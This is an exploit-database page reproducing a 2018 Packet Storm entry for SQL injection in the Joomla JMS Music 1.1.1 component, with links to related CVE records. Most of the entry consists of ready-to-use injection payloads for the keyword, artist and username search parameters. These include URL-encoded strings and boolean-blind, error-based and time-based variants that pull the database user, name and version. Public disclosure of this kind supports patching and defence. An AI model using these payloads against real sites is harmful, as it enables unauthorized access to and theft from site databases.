Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormIhsan SencanPACKETSTORM:146216
HistoryFeb 03, 2018 - 12:00 a.m.

Joomla! JMS Music 1.1.1 SQL Injection

2018-02-0300:00:00
Ihsan Sencan
packetstormsecurity.com
28

EPSS

0.003

Percentile

68.6%

JSON
`# # # # #  
# Exploit Title: Joomla! Component JMS Music 1.1.1 - SQL Injection  
# Dork: N/A  
# Date: 01.02.2018  
# Vendor Homepage: https://www.joommasters.com/  
# Software Link: https://extensions.joomla.org/extensions/extension/multimedia/multimedia-players/jms-music/  
# Version: 1.1.1  
# Category: Webapps  
# Tested on: WiN7_x64/KaLiLinuX_x64  
# CVE: N/A  
# # # # #  
# Exploit Author: Ihsan Sencan  
# Author Web: http://ihsan.net  
# Author Social: @ihsansencan  
# # # # #  
# Description:  
# The vulnerability allows an attacker to inject sql commands....  
#   
# Proof of Concept:   
#   
# 1)  
# http://localhost/[PATH]/index.php?option=com_jmsmusic&view=search&keyword=[SQL]  
#   
# %45%66%65%27%20%41%4e%44%20%28%53%45%4c%45%43%54%20%36%36%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%2d%2d%20%56%65%72%41%79%61%72%69  
#   
# Parameter: keyword (GET)  
# Type: boolean-based blind  
# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)  
# Payload: option=com_jmsmusic&view=search&keyword=-5694' OR 3737=3737#  
#   
# Type: error-based  
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
# Payload: option=com_jmsmusic&view=search&keyword=Efe' AND (SELECT 5924 FROM(SELECT COUNT(*),CONCAT(0x7178787671,(SELECT (ELT(5924=5924,1))),0x716b626b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- BeNf  
#   
# Type: AND/OR time-based blind  
# Title: MySQL >= 5.0.12 OR time-based blind  
# Payload: option=com_jmsmusic&view=search&keyword=Efe' OR SLEEP(5)-- EoWI  
#   
# 2)  
# http://localhost/[PATH]/index.php?option=com_jmsmusic&view=search&artist=[SQL]  
#   
# %27%20%20%2f%2a%21%30%32%32%32%32%55%4e%49%4f%4e%2a%2f%20%2f%2a%21%30%32%32%32%32%53%45%4c%45%43%54%2a%2f%20%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2d%2d%20%2d  
#   
# Parameter: artist (GET)  
# Type: error-based  
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
# Payload: option=com_jmsmusic&view=search&artist=Efe'||(SELECT 'ziQV' FROM DUAL WHERE 5411=5411 AND (SELECT 5581 FROM(SELECT COUNT(*),CONCAT(0x7170767171,(SELECT (ELT(5581=5581,1))),0x7170706b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a))||'  
#   
# Type: AND/OR time-based blind  
# Title: MySQL >= 5.0.12 AND time-based blind  
# Payload: option=com_jmsmusic&view=search&artist=Efe'||(SELECT 'xwge' FROM DUAL WHERE 8319=8319 AND SLEEP(5))||'  
#   
# 3)  
# http://localhost/[PATH]/index.php?option=com_jmsmusic&view=search&username=[SQL]  
#   
# %45%66%65%27%20%41%4e%44%20%28%53%45%4c%45%43%54%20%36%36%20%46%52%4f%4d%28%53%45%4c%45%43%54%20%43%4f%55%4e%54%28%2a%29%2c%43%4f%4e%43%41%54%28%43%4f%4e%43%41%54%5f%57%53%28%30%78%32%30%33%61%32%30%2c%55%53%45%52%28%29%2c%44%41%54%41%42%41%53%45%28%29%2c%56%45%52%53%49%4f%4e%28%29%29%2c%28%53%45%4c%45%43%54%20%28%45%4c%54%28%36%36%3d%36%36%2c%31%29%29%29%2c%46%4c%4f%4f%52%28%52%41%4e%44%28%30%29%2a%32%29%29%78%20%46%52%4f%4d%20%49%4e%46%4f%52%4d%41%54%49%4f%4e%5f%53%43%48%45%4d%41%2e%50%4c%55%47%49%4e%53%20%47%52%4f%55%50%20%42%59%20%78%29%61%29%2d%2d%20%56%65%72%41%79%61%72%69  
#   
# Parameter: username (GET)  
# Type: boolean-based blind  
# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)  
# Payload: option=com_jmsmusic&view=search&username=-1653' OR 6007=6007#  
#   
# Type: error-based  
# Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)  
# Payload: option=com_jmsmusic&view=search&username=Efe' AND (SELECT 8019 FROM(SELECT COUNT(*),CONCAT(0x7171766b71,(SELECT (ELT(8019=8019,1))),0x7171767071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- rMej  
#   
# Type: AND/OR time-based blind  
# Title: MySQL >= 5.0.12 OR time-based blind  
# Payload: option=com_jmsmusic&view=search&username=Efe' OR SLEEP(5)-- rhvR  
#   
# # # # #  
  
  
`

Related

exploitdb 1
cve 1
prion 1
cvelist 1
nvd 1
exploitdb
exploitdb
Joomla! Component JMS Music 1.1.1 - SQL Injection
2018-02-02 00:00:00
cve
cve
CVE-2018-6581
2018-02-02 17:29:00
prion
prion
Sql injection
2018-02-02 17:29:00
cvelist
cvelist
CVE-2018-6581
2018-02-02 17:00:00
nvd
nvd
CVE-2018-6581
2018-02-02 17:29:00

EPSS

0.003

Percentile

68.6%

JSON
Related for PACKETSTORM:146216
exploitdb1cve1prion1cvelist1nvd1